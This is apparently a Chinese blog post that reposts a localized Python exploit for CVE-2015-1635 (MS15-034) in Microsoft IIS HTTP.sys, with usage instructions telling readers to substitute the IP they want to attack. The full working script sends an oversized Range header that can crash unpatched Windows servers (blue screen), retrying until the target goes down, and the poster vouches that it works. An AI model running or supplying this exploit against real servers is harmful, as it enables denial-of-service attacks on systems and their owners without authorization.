A-A+
http-cve2015-1635 EXP HTTP.sys 远程执行代码(CVE-2015-1635 MS15-034)
本执行代码转载网络来源地址:http://www.securitysift.com/an-analysis-of-ms15-034/
本人经过汉化了,如果看着汉化的不顺眼可以自己去用原版。。。。
http-vuln-cve2015-1635.nse HTTP.sys 远程执行代码exp
网上的试验了几个都不好使,不知道为什么,但是下面的这个本人亲测,绝对可以用de POC。
把下方代码保存为 xxxx.py 试用方法: xxxx.py http://ip(换成你要攻击的IP) -e (使用这个参数表示开始攻击。)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 | #!/usr/bin/python
#coding=utf8
import urllib2
import sys
import argparse
import socket
''' get cl args '''
def getArgs():
parser = argparse.ArgumentParser( prog="ms15_034.py",
formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=50),
epilog= "这个脚本将测试存在或利用DOS状态ms15_034")
parser.add_argument("target", help="Target Host in the form of http://[host]:[port] -- specify port only if not 80" )
parser.add_argument("-p", "--path", default="/welcome.png", help="资源在目标服务器上的路径 默认 [default = /welcome.png] 上面是win7的 /iis-85.png 是win2012的")
parser.add_argument("-e", "--exploit", action="store_true", default=False, help="加上此参数则表示攻击此服务器 默认 [default = False]")
parser.add_argument("-r", "--range", default="0-18446744073709551615", help="修改头部代码 默认 [default=0-18446744073709551615]; 这可能会导致对方服务器蓝屏!!!")
args = parser.parse_args()
return args
''' make the evil request and examine response to determine vulnerability '''
def evilRequest(req, exploit):
res = ""
if exploit:
print "[*] 尝试测试中..."
try:
res = urllib2.urlopen(req).read() # make request
if exploit:
print "[*] 无法解析响应,检查目标,请查看是否成功!"
else:
print "[*] 请求成功,可能不易受攻击" # 如果没有返回错误,目标可能是不易受攻击的
except:
if "Requested Range Not Satisfiable" in str(sys.exc_info()[1]): # response if target is unpatched
print "[*] 恭喜恭喜它有漏洞呦!!!"
elif "The Request has an invalid header name" in str(sys.exc_info()[1]): # typical response if target is patched
print "[*] 目标出现了"
elif (("Connection reset by peer" in str(sys.exc_info()[1])) or ("forcibly closed" in str(sys.exc_info()[1]))) and (exploit): # often DoS exploit not successful on first attempt
print "[*] 连接复位,重新尝试利用..."
res = evilRequest(req, exploit)
elif ("timed out" in str(sys.exc_info()[1])) and (exploit): # prevent loop after DoS function (used w/ socket timeout variable in main)
print "[*] 请求超时,可能成功了呦。"
elif ("timed out" in str(sys.exc_info()[1])) and (not exploit): # prevent loop after DoS function (used w/ socket timeout variable in main)
print "[*] 请求超时,但利用开关不使用。你有没修改文件头大小?"
else:
print "[*] 不能确定目标是否有漏洞" # any other response means vuln unknown
print "\t[+] Response: %s" % str(sys.exc_info()[1]) # print server response
return res
''' main '''
def main():
print
print '============================================================================='
print '| ms15_034.py - Test and DoS exploit |'
print '| Author: Mike Czumak (T_v3rn1x) - @SecuritySift |'
print '| 虾米汉化 URL地址:https://woj.app/ |'
print '=============================================================================\n'
args = getArgs()
target = args.target # target server
path = args.path # path to resource to retrieve on target server
range = args.range # value of Range header
exploit = args.exploit # boolean (exploit DoS or not)
if exploit:
range = "18-18446744073709551615" # evil range if requesting welcome.png
# may need to change if requesting different resource (use range arg instead)
print "[*] Making request to " + target
print "\t[+] Target path: " + path
print "\t[+] Range Header: " + range
print "\t[+] Exploit (DoS)?: " + str(exploit)
print
socket.setdefaulttimeout(10) # timeout the connection in event of DoS/reboot
req = urllib2.Request( "%s%s"%(target,path), headers={ "Range" : "bytes=%s" % range }) # format request
res = evilRequest(req, exploit) # make request
print
if __name__ == '__main__':
main() |
布施恩德可便相知重
微信扫一扫打赏
支付宝扫一扫打赏